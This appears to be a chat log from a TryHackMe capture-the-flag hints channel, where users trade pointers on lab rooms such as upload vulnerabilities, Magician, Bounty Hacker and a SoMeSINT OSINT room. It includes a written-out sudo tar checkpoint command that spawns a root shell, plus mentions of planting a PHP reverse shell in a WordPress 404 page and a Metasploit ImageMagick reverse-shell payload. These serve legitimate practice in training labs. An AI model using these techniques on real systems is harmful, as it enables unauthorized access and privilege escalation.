Just like in Linux when running a binary you type ./path/to/binary.extension

but its either asking to download or open the file

Hm, did you follow the instructions correctly?

I did

Would you be able to provide a screenshot that includes the pop-up please:)

can you tell me is the correct?? I've upload the file evil.php5 and the path will ||http://magic.uploadvulns.thm/graphics/evil.php5|| right??

Magic as in ||Magic Bytes||?

Sorry it's a while since I completed the room.

has anyone done Tokyo Ghoul?
just want to discuss privesc
I've done it
but really enjoyed it, want to see alternate methods

Sure you can dm me about it

Hmm

I don't have any notes on this room and there are no write-ups.
Please make sure the file extension is correct and you are navigating to the correct URI.

Not only that but it says that the script is a php script, in the room magic seems to be magic bytes, if I am not mistaken.

Make sure the magic bytes are correctly setup on the file.

i got it

I mean , my payload is working . The mistake is, I've used ||4 characters(AAAA)|| instead ||6(AAAAAA)||

@trim haven thank you

No problemo

There's a talk on the subject by Mark Baggett at Kringlecon 2018 on YouTube. No idea how many of his methods work on this, but if you're interested it's worth a few minutes of your time

https://www.youtube.com/watch?v=ZVx2Sxl3B9c - thanks, got it!

👍

I've had a little SSTI exploitation experience, in Flask/Jinja specifically

so that helped a little, but thanks

ah

have you found

the interesting directory

in the ftp

@white salmon

oh sure, lemme know if you want a pointer when you get back to it

I am trying to root bad-byte room and stuck at finding users password, i tried enumerating for config files, history, linpeas, linenum, then opt dir or backup dir. But i am not able to figure it out any hint will be appreciated...

i am doing tokyo ghoul but after logging as anonymous in the ftp server i am not able to get the second file from need help dir

room name : magician

y couldn;t i upload ??? it's not accepting it ? any help ?

I suppose Talk_with_me is a dir

ohh sorry leme try again

thanks for your help

DId u visited the port 21 where u are getting something interesting

yes

Did u went through that

yes i got link which led me to imagetricks vuln

That's it apply the steps to go further for vuln

yea done .. applied and created file testv.png and trying to upload it's not getting uploaded

i tried normal png that's also not getting uploaded

Try uploading image file with starts with extension png and see what happens

If u want u can DM me the ss

sure leemme do it

Ok go for it

Introductory Networking/traceroute. When I enter traceroute into Attack Box it says traceroute command not found. Help

hi guys. I am solving startup.I got the initial foothold to the box and also found pcap file.But I m not very good with wireshark.Am I heading the correct way??

Hello, how can I find the path of that 404.php file?

page.thm/somethingrandom?

for wordpress i suggest to take an actual page that is on the site and add a random letter in the URI

I found it navigate through themes path however I didn't know that, I will try next time. Thank you

have you got a blog post on that?

my go to is creating/editing a plugin which is malicious

that usually works

Nope

Just add a php rev shell into 404 and ur goos

Good

U can also do /wp-themes/theme/404 if im not wrong

yes, that works for me

or /wp-content/theme/404.php

How to execute an exe file provided for reverse engineering ?
I am trying REloaded challenge for reverse engineering in try hack me
I tried wine, but I can't able to run the file which I patched!!

Thanks

Can you run it it windows?

I mostly use linux. So I didn't tried

I want it to run in my parrot os

I can't get you bro

I patched but, I want to make it run to get flag

For the first two challenges it was done by string and ghidra decompiled code. So, I didn't faced any issue. But for the third one I need to patch and run

I patched but I feeling difficulty in executing

To be honest, in the great scheme of things, it may well be easier to set yourself up with a windows vm. It'll be useful for malware analysis and buffer overflow boxes as well. Or...you can actually find all the flags on that box without running anything.

Good idea bro. But, I don't have that much space in my PC. It was limited to only one os in virtual box

No bro

Having a windows VM is always useful

Make sure you thoroughly review every document in the user’s home directory. One will give you an idea of where to go.

hello hello, i'm working on room "fuel". i've acquired a low level shell, can anyone give me a hint on the privesc?

i've tried linpeas and 2 kernel exploits so far which didnt work

sure

@solid radish as in, the ignite room?

yes the ignite room

sure, pm

what is rear!?

i need help with Golden Eye I only have one question left to complete the room its task2 question 3

Inspect port 55007, what services is configured to use this port?

what do they mean by services?

Rare is the opposite of common

Ok thanks

that's a bug in the room
the correct question needs to be : what command do you use to communicate with the service on port 55007

oh ok thanks

thanks been banging my head on the keyboard for about a week now trying to figure that out

yup i came across the same thing and it was last week too lol

happy to help

How do I figure out "Based on the title returned to us, what do we think this port could be used for?" <- network services

nvm I figured it out, I had to use ||telnet ip port|| but if there is another solution I would greatly appreciate to know it :-)

heya, I'm on the wireshark 101 room, task 7 for ARP traffic. The question is "What 4 packets are Reply packets?" though I'm not exactly sure how to pinpoint reply packets specifically

edit: solved, so there isnt any way to filter specifically for ARP replies, if I just filtered normally for "arp" and looked at the info section its pretty self explanatory and the replies stand out.

https://tryhackme.com/games/koth/join/435e677fb5f539fbcfa2e49b

Can we ask hints for Enterprise?

Nope, 72 hours have not passed yet.

Spooky said he’s more than happy to have hints now that it’s blooded

Oh so write ups are allowed ?

Not sure about writeups but you can submit an unlisted one to the room

Then it will get accepted or denied depending on if spooky wants writeups on ut or not

I would have to make the video public tho would that be ok ?!

Hmm not sure @last nova you ok with this? ^^

Which layer of the TCP/IP model will traceroute run on by default (Windows)? please help me anyone

https://learningnetwork.cisco.com/s/question/0D53i00000Kt4LqCAJ/traceroute-works-on-which-layer

I'm on the linxbackdoors (https://tryhackme.com/room/linuxbackdoors) room i finished it but I can't find pam_unix.so on my machine other than "/usr/lib/x86_64-/usr/lib/x86_64-linux-gnu/security/pam_unix.so" that is not editable is this normal ?

sure for writeups

cc @balmy verge including video

It's Madness.

Hint for "The Impossible Challenge" room? I'm stuck at the start

hint plz: Yara room, one question left: Task 11: valhalla:
Besides .PHP, what other extension is recorded for this file?

tried txt, .js, not correct !

Could I get from hint on Pickle Rick? I've found the login page and the username and right now I'm trying to do a brute force attack via burp and parsing the responses but no luck so far. I thought there maybe was some easy sqli to bypass the login and I've tried some variant of ' OR 1=1-- without success. Could I get a pointer? I'll give the brute force some more time. (beginner)

did you look in /assets?

yes but I missed the interesting info the first time I looked. thank you, a good hint. Will get on it! 🙂

my notes on this one aren't super detailed, that might not be helpful

I need a little help on the Magician room. I've created a png using metasploit (expolit/unix/fileformat/imagemagick_delegate) with my vpn ip and port. I upload that to the site (/etc/hosts is modified). But my nc listener isn't getting hit. Did I miss a step?

haven't tried using that

I needed a 2 stage payload

burp?

no

downloaded the payload via wget

there should be an example in the research material

at least I never got it working properly with a single payload

so I did just get my metasploit-generated png to call back and open a reverse shell, single payload

the only thing that I did differently was adding the msf option 'target = 1', which was not a visible option in msf, but was mentioned in a guide I read

I've found the flag and cleared the room. I've noticed that the output format varies on each load of the page. I'm trying to find all decoding methods. binary/ascii, base64, but not sure about the other two.

anyone got enterprise ? i got username and password but stuck

@last nova Hey, just submitted the write-up, sorry if i butchered a lot of stuff 😄

Just skimmed through it, looks good!
fyi, MSFVenom has -f exe-service (or exe-svc) for Unquoted Service Paths

Good to know thank you ! again it was a great box looking forward for more 😄

just gave you a shout-out https://twitter.com/NekoS3c/status/1373781812833583106

ayy really appreciate it man thankkk youu !!

wow didn't see that coming 😄 thanks for the videos

I'm so narrow minded, didn't even click, derp

can I get a hint on brooklyn nine nine?Does it require stego?

Can i get a hint for Year Of The Fox? I'm not getting anything. I tried ||to enumerate the smb and i found a share but is unnacessible with anonymous login, i found the username fox and i tried to brute the web and the smb with hydra. Then with wfuzz i tried to search some files or directories on the website but nothing.||

UPDATE: ||i found a new username named rascal and now trying to brute web||

Hi there, just wanted to check about something in the "Introductory Networking" room.

In regards to Task 6 Ping, the final question asks "What switch would give you a more verbose output?". I've gone through 'ping man' and tried 'ping --help' and the only switch I can see (that seems to tick this box) is -v but TryHackMe states it is the wrong answer.

Am I blind and missing something or is it a bug?

try refreshing the web page and see resubmitting and see if that does it.

I don't believe it. That fixed it 🤦‍♂️

Thank you

haha, it's an anti-brute forcing technique

I haven't got far enough in the course to even know how to brute force successfully 🤣

Is anyone having issues connecting over rdp on the room Enterprise? i've tried xfreerdp and remmina but both do not work, once xfreerdp worked but it was unusable. Now i am getting: Timeout waiting for activation, i've tried resetting the room but that has not helped

@edgy inlet @pine reef It's looking like it's a lack of resources, fix will be coming soon

Great, thank you for the fast reply

Thank you .. Ok i thought the problem was with vpn. And i delete my favorite server 😫

anyone got hint on virtual plant ?

That's a brand new challenge room, so rule 13 applies here. No help/hints for 72hours after release

@simple mountain Wanna do your messages for it?

Hi Hello! I'm working on jurassicpark and am having trouble finding the third flag.

I was hoping someone might be happy to nudge me in the right direction. I've found all the other flags with a simple find command

Do not provide or ask for help or hints for the Attacking ICS Plant #2 room until 24th March, 7pm (GMT)

hi

hey guys can somone help me with linuzz room?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

yeah k, if someone can help me with lunizz room priv esc to mason user would be fantastic.

I finaly found it after doing Empire and What the shell rooms :) Do you have by any chance any pointer regarding one last remaining question ? I can't find the registry path queried by the attacker. I've looked every RegQueryValue in ProcMon on time given in thm hint but none seems to fit the correct answer.

Good work digging that out! The only hint I can give you for that last is that I found it by identifying what had to be the value before the space (by size)and then filtering on that. Even then I had to scroll through a fair few entries until I found the right one. Apart from being the right length it didn't really leap out at me. Unsatisfactory and I'm sure there must be something more scientific but unless someone's prepared to explain I haven't a clue 😎🤪

Ahah I did try that also but got bored, will check that again with your method. I'll let you know. Thanks for replying !

Which path you are following? Is it the intended way or the unintended?

the intended one

i was checking the write up to be sure and the path is the right one

Coz most of us did the other way with sudo vulnerability exploit...the reason the decrypt the the bcrypt was taking a longer time using rockyou

nono i made that part

i would like not to use the sudo exploit

i hist have problem with the "lights" pssw

Oh...

just*

You got the Name of the place?

yeah

So that's the pass of mason

yeah but also no ahahaha, i know thats it, but it does give me "auth error"

can i dm you?

In bounty hacker, i cant being root. I did ssh connect

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Im stuck in priv esc

Ok. So what have you tried so far?

I did connect the ssh and i upload linpeas, i try to crack id_rsa but not worked

Also there is the name of tar Vulnerability , i used gtfobins but not working Just shell

So you know you're exploiting the right thing

So maybe screenshot what you're doing and what's going wrong?

@stuck fractal

||Sudo tar|| was the correct path

That is not.

then its asking me what is sudo password

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

you mean this right ?

Yes.

Don't you have the user's password?

wait

oh gosh

im feeling dumb rn

thanks

Finaly, I got it right. It was not the first reg entry I would have thought of. Thanks a lot for your help

Thanks, now everything works 🙂

@stuck fractal The hash vs encryption question in task 3 must make you happy: https://tryhackme.com/room/passwordsecurity

Hey, are hints allowed for the new OSINT room ?

Yep, it's a walkthroguh

I got a question on the OSINT one

42

cool, im stuck on the ||pastebin || part would appreciate a little nudge 🙂

same

hahah

which room is this? I don't recall that off the top of my head. Don't have my notes in front of me, but I might be thinking of a different room

came out tonight

didn't get announced tho

link?

https://tryhackme.com/room/somesint

ah, okay. Thanks. Sorry, I haven't done that one, I was thinking of a different room

Is it broken? It looked like the ||pastebin|| was removed from the site

I have no idea, maybe we could ping the creator ?

@obsidian briar Hey, can we have a sanity check here ? seems like a few people are stuck on this part of your box, are we missing something ?!

Thanks

no the link is broken

Let me check the link

Yup it's invalid

I'll DM him

I hope you got permission first.

Haha it's your friend OK

Hi!! I'm going to fix this ASAP, seems like waybackmachine did a whoopsie and deleted my archive. Gonna use some quick thinking and remake it ;)

It's funny because it was working a week ago when I demo'd it for some people , must've been unarchived really recently

haha, its ok its been a very fun box til now hopefully you can fix it real quick and when you do please ping me here so i can continue the box 😀

Hey awesome! Give me a shout once you manage to resolve this and we'll look into a way of preventing this sort of thing happening again. We (as room testers) really try to avoid content that has pastebin/sites of that nature purely for that reason but this looks to of been slightly overlooked

But yeah -- gimmie a shout once you get this sorted and I'll post it somewhere more permanent in lieu of relying on pastebin/etc

Hey!! I fixed it, I ended up putting a disclaimer in the txts, I think they got removed from archive because they were categorized as illicit or something bc of the nature of the fake emails in it (implying blackmail), they should be back up

Awesome stuff

@balmy verge @uneven bane @vague birch @glacial ember @rustic sphinx it should be fixed if you were stuck 😄

Can I DM you real quick if you could spare the time please?

Absolutely!

Gnarly 🤙

Thanks for being so quick with this

Of course!

Great box, Thanks!

Thank you for being a part of it! 😄

I'll make a video for it tomorrow hopefully 😄

Coolio!! There's a possibility of me changing the link to a more permanent place but the methodology will be the same

on the ccpentesting room, task 20, final question there, syntax for smbmap. I'm wondering if the question prompt is outdated for the answer format. Looking at the number of asterisks, it doesn't match what I think it should be. Nothing I've tried so far has been valid.

how many asterisks are you off

2 on each of the larger blocks. I've also tried surrounding each arg with single quotes, no dice

try double

yep, that's what it was. Thanks

np

Thanks so much for fixing it so quickly. Awesome box, I love OSINT!

No problem, I'm glad you enjoy it!!

anyone know why network services task 3 question on what sticks out is "Profiles"? Trying to understand why profiles is something that would stick out after performing a an nmap scan or enum4linux scan..

All the other shares are defaults

is this determined under the share enumeration portion of the enum4linux scan?

Is what determined?

The fact it's non default is not determined there, but that's where you're shown the share

so if you were familiar with default windows shares , you would then know that profiles share is not one of them?

It doesn't end in a $, for one

Not default windows shares. Default SMB shares.

Roger. Thanks for pointing me in the right direction. much appreciated!

Check the shadowban API. What is the value of "search"?

I got stucked in the above question from KaffeeSec - SoMeSINT Room
any nudge would be much appreciated

I'm not sure we're allowed to help with this room yet

If any mod can confirm or deny, then I can give you a hint

Yup ^

@sand mesa Please respect rule 13 🙂

ok sorry... i thought it was a walkthrough..
np..

If it is a walkthrough room, then my bad 😄

Lemme check

It is a walkthrough room, my bad. Hints are allowed.

thanks jabba

@sand mesa did you use the tool that was hinted at in the description?

yeah but it is failing to search

make sure you put quotes around

then it should search

thanks @stark reef
shall i dm?

you're welcome

dm what?